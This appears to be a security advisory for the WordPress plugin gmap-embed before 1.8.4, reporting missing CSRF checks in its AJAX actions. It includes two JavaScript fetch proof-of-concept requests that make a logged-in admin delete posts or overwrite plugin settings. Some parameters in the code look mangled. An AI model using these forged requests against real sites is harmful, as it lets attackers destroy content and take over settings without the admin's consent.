The plugin does not have CSRF checks in most of its AJAX actions, which could allow attackers to make logged in admins delete arbitrary posts and update the plugin’s settings via a CSRF attack
Removing post: fetch(“https://example.com/wp-admin/admin-ajax.php”, { “headers”: { “content-type”: “application/x-www-form-urlencoded”, }, “body”: “action=wpgmapembed_remove_wpgmap&post;_id=1”, “method”: “POST”, “credentials”: “include” }).then(response => response.text()) .then(data => console.log(data)); Updating settings: fetch(“https://example.com/wp-admin/admin-ajax.php”, { “headers”: { “content-type”: “application/x-www-form-urlencoded”, }, “body”: “action=wpgmapembed_save_setup_wizard&wgm;_api_key=hohohoho&wgm;_language=999&wgm;_regional_area=aaaaa”, “method”: “POST”, “credentials”: “include” }).then(response => response.text()) .then(data => console.log(data));
CPE | Name | Operator | Version |
---|---|---|---|
gmap-embed | lt | 1.8.4 |